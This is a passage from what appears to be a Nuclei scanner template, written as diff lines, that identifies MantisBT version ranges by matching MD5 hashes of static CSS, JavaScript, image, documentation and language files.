method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_flat_0_aaaaaa_40x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2a44fbdb7360c60122bcf6dcef0387d8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_ffffff_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"a19fe1b2d726e920c12e43a65df9039a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_228ef1_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2f257489d9600ddf56d195a179ebc9df\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_222222_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4c27b34156b7a3776f31cc456ca01c10\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/icons-18-white.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b3da1f56006b8f830af6dde218d72185\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/icons-36-white.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"632ff9bef83adcf1cd745c938a4216af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_highlight-soft_100_eeeeee_1x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0b708185ce8927f18c7b3b82a7e7c247\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_75_e6e6e6_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f4254356c2a8c9a383205ef2c4de22c4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_55_fbf9ee_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f8f4558e0b92ff2cd6136781533902ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_454545_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"119dd0c2e94ad689de873ef39fd43e6e\" == md5(body))" + + - 
method: GET + path: + - "{{BaseURL}}/css/images/ajax-loader.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3bdd7116009b8f7b091b44e5e71a967c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_2e83ff_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2b99a5e48d3c3957d03027d36a25e8bb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_65_ffffff_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b624f702075cd719a38f428e143025ea\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/open-sans.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"7cafad97aafcdaa7fce10cc2d6201e51\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-rtl.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"36f9d61abb30f70f4bfafdd8b570fac5\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"c0d5fbd10e11824bd7eceac0fe75bcec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.3.6.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"96fab2e78ab167d8b2bf13a709030b11\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-skins.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"7c31ea5156c20439e3e7cb74d7a670b1\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"d5139739940ab61741bd73d5b682aff7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-skins.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"2a2f41e2b21b031a14c09833d4b782b2\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"56b5775aad43cba224258c28621b5245\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone-4.3.0.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"b9cbf279e35c988f3eeaa2521d9234dc\" == md5(body))" + + - method: GET + 
path: + - "{{BaseURL}}/css/bootstrap-datetimepicker-4.17.47.min.css" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"fc28fdcaebe06f95b628b7afff4afa9e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/rtl.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"55aa6b70a60bcf0ee7c5b24564a7b668\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"a9e44d30b8cee47ce4c44866659672db\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"dc735a8099caeff3366ec7140ad48260\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-part2.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.7.1 + dsl: + - "(\"f5e7d799350827de62366feb0cc2afe4\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"2fd79ef21a811bbaf05d9b0dbb88d126\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-ie.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.7.1 + dsl: + - "(\"1763ade9dc29ec8e4c44f55aec66418d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-ie.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.15.1 + dsl: + - "(\"518e36655b2f252f6213472ceb1d5dbb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.3.6.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"d33c26316e73bab38fbaa1dab3ec9ce4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/Makefile" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3248a5e47574567a1ee52c0b3aeb9266\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Author_Group.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"ad956a3236dfde8b2c4b61d930d09e43\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Book_Info.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"2ca5366da3286bdd4888d40908fc8286\" == md5(body))" + - type: dsl + name: 
1.3.0 - 1.3.20 + dsl: + - "(\"01a70c2990755a3cec39f8a3dc09ecdb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/news.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3283c9516475b9591b1c26de98b1b451\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/subprojects.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"75b06e7076d7e3c1238e4190f85b9e10\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/cookies.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"424428a7b03b3ba8b4e93eee06029436\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/user.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"7dde1c25b3945b6401196329e2e2fa2b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/path.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"4802464f16c76d6d42b9bf01d3de9042\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"554cfaafabcb5d260af2c4d8027a584f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/sponsorship.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b9ddcc1216a1ca9f8dc571a149fea839\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/wiki.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"a99cf90055989ac146e707e4dd9ca733\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/view.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"f67d0495cd323929c6b432c4af932796\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/customfields.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - 
"(\"62a756872bbb512d13fc60b3785e2190\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/timezone.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"027be4b01ba27fbf83a983f807c36f94\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/language.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"9db91e6a1710ba774a229f20ab72711a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/version.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.24.3 + dsl: + - "(\"33ce0f963160c9617ea6c782011ce426\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.2.4 + dsl: + - "(\"5f7a847cc4e56c2919cf12e8f547ffc1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/settings.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0c8cdc150fdfdffde8c9d25e5762fa3f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/speed.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"fd37d5f595ff8b4091f2eeb27c6624de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/antispam.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8c6630b9ccbd3172cac9c2f29160e7e7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/bugnote.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"9ea2d031cc6634717c784a2d62ca904d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/reminders.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d013acad11d27a619cd0c9ca06ff6b95\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/security.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3b87bc46f8693c2f71c4b10755cfd005\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/signup.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c2ff0bfac16810a6aeeab35e68e3b0b1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/time.xml" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"feda0f37193304c458c854c882f2704e\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"4da2f31d192b47942247fe25b00b296d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/bughistory.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"bb7e2aa975efdcbf864f2b644f64e85b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Admin_Guide.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2aa74e623530c8424566ca6f55311abe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Project_Management.xml" + + matchers: + - type: dsl + name: 1.3.5 - 2.24.3 + dsl: + - "(\"a57ee7fb8ae248036fd7827ef4fb2cca\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"25bb9418692f7a7c34b02659bcd3931c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Admin_Guide.ent" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0a295807a7bb252472ea026e5450b289\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Preface.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"ef36e942a7936ee437d9b19e18f543d3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Authentication.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"9ca72797361731458f92d1adead05ec3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Contributing.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - 
"(\"15d47247bcb04722df33f214b1f32618\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Makefile" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"816bcc6df5387e07e143c4d3cf23dbd3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/README.md" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4334c1e93429d46673f2fea24c1e63c4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/Makefile" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3248a5e47574567a1ee52c0b3aeb9266\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Plugins.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f0a17bfeb995676c9248f2d5134611d1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Manage.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"e444586036d3b644d5e82ef09468f107\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Integrating.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d77ca4774641a8a406d631202f9cfcc8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Developers_Guide.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d2f69318495e5e65fc1ea274262772f6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Notify.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c0d85e5f81ad97e283a94490d3e37603\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Author_Group.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"ad956a3236dfde8b2c4b61d930d09e43\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Database.xml" + + matchers: + - type: dsl + name: 
1.3.0 - 2.24.3 + dsl: + - "(\"8e553d20f62b3cdcc9b8cde5851c69f8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Book_Info.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"864bf62933bf2fe4e0db8956166918d8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"f418102e242fa3b39e404da890ba93c1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Filter.xml" + + matchers: + - type: dsl + name: 1.3.4 - 2.24.3 + dsl: + - "(\"11ff9b50af1e6465b902c4560e113b01\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"78cedeaa9dda3581d0fbb0d8ef9feabb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Developers_Guide.ent" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d8a3d1c6e1aca4ec1154a263ce1fd801\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Plugins_Building_Source.xml" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"b9da5d2123ba3bffa4425e44cd2c2f90\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"c2ba1439ec0e7cbe3dba7d9b6b70103d\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"cbb96f124cee88dd6d16dcfa3b644a4f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Plugins_Building.xml" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"5a91e584ea408c9bfd4f29833dfdd480\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"5b5fb7c2595e5a2209f25ff7ecb5ae76\" == md5(body))" + - type: dsl + name: 1.3.3 - 1.3.20 + dsl: + - "(\"46854c99eb8ec914ffa4816d404ee702\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.2 + dsl: + - "(\"4335a26efcbcee4d2049bf455627f6cf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Preface.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + 
dsl: + - "(\"441ecd570493591d6105fd8868921705\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Appendix.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1781bb57a74f1b14f114b787015840b6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Account.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"503dfad6ddc5972c4cdedf1287e3fcac\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/typeahead.jquery-1.1.1.min.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.22.2 + dsl: + - "(\"2a2dbfad50a690d862cf167df535c418\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"7e5cbf6f5cf6af4dc2704bd7f8f68a07\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"ab406dafaba62a12ebffd6cb79290e9c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/html5shiv.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.7.1 + dsl: + - "(\"737724351e2197f55eabc27c83fdb1a5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace.min.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"d8fcc48393e5d4360d425178e71e5c80\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"97aa9435ebfd13fea1fb46a832219a9f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/moment-with-locales-2.15.2.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"c3c60413c0751ed1b69a98927779f7ee\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.3.6.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"c5b5b2fa19bd66ff23211d9f844e0131\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/list-1.4.1.min.js" + + matchers: + - type: dsl + name: 2.1.0 - 2.19.1 + dsl: + - "(\"d3d341a0eb64ad79c3d31f57091cc020\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/js/login.js" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"09c78eb02c644ec0d4512f5e3cb6b520\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jquery-2.2.4.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"2f6b11a7e914718e0290410e85366fe9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/respond.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.7.1 + dsl: + - "(\"cdef4a9c511a600425696d10d138a64b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/manage_custom_field_edit_page.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"3f65dd805a1e8677f7477b8825bb846c\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"10a2d6ae70b37869bf7b3f120d4504c0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone-4.3.0.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"3bd5e9eb88ec2d7ee8825bccc6462646\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-datetimepicker-4.17.47.min.js" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"8a36160a466cad1a9e414321f4784baf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone-4.3.0.min.js" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"f9b915337650a13583b5d29d30464f99\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.6.0 + dsl: + - "(\"c965624f47469ce0e4e3cb75bc56a2b0\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8f9bcc30e5372d9dff4e55da3a1f52ce\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"f9961b048ec7fc3d78e8a0b25b9dce7b\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.24.3 + dsl: + - "(\"c5d2d2f6036c14a4e345db69b70590bd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/summary.xml" + + matchers: + - type: 
dsl + name: 1.3.0 - 2.7.1 + dsl: + - "(\"9675f4c0b6709967fa955d3ca0566372\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.24.3 + dsl: + - "(\"2dcbddc633e43bfa0c72f517cf73366c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_dutch.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"c3fb9868bd146b30628c061e20fcb942\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"613c5054714302a5b75cbad5c416a7ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"85cb4a22c67d4552c62fb16357739cfd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"63ff962e132c66dd3e67203d2c437b62\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_laki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.14.0 + dsl: + - "(\"cc69014c4f3c309ca4fd29bd38b9650a\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - "(\"bc394e2fbb8f85ff5f34081750c19d57\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_laki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.14.0 + dsl: + - "(\"f78db1de766a5aa41823365451b0f945\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - "(\"571699bcd813d8e7b2383993bedd523e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_spanish.txt" + + matchers: + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - "(\"7ec8b513d9ca4817f58ee996737a76a2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - 
"(\"0c0415e9ca06cc7865c7dfe349ceb318\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 2.15.0 - 2.24.3 + dsl: + - "(\"bc708807c00f42281a6ce9ab228b6357\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"6165d232ccd804d081b726cc3b5e92f2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_japanese.txt" + + matchers: + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"f1e2808f2f12d9f3952835384fba9bf1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"d00075f368ddb9dc6a63e2beb6e97759\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"fa07398cd9e328474fc39367a121f716\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.24.3 + dsl: + - "(\"0eab425ca8985b0e6c6955852738c869\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.14.0 - 2.18.1 + dsl: + - "(\"fc276ea31091a5aaa544cfb951d237e7\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.24.3 + dsl: + - "(\"7e417ad80c69048cee80d8f8b9df5d5c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/README.md" + + matchers: + - type: dsl + name: 2.19.0 - 2.24.3 + dsl: + - "(\"ed26bacc7c500a31b5b3b5cf3827cfe9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/vendor/Web.config" + + matchers: + - type: dsl + name: 2.20.1 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/html.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.8.1 + 
dsl: + - "(\"ea608a51a9075d13c7809f51fe689365\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"4efe58d412c61767cc2323abf56e7877\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.20.1 + dsl: + - "(\"36822d9911d3eb205488978addc7cbe9\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.24.3 + dsl: + - "(\"fb470c8f1ecf036cdc1f0f15c1d0a90e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_eo.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"3d9a4cd1da33fc68ee423c474d6cece4\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8398db5cf9ead698b805f740f7154952\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_basque.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.15.1 + dsl: + - "(\"f79098275a282cad48dd81c36f68aab7\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"fd4b22eb4723e170f452bf2e79075b69\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"034ee5c0b0e95e1298504550a3bf08d3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"804215df625b9fdf23dd7645dda26026\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - 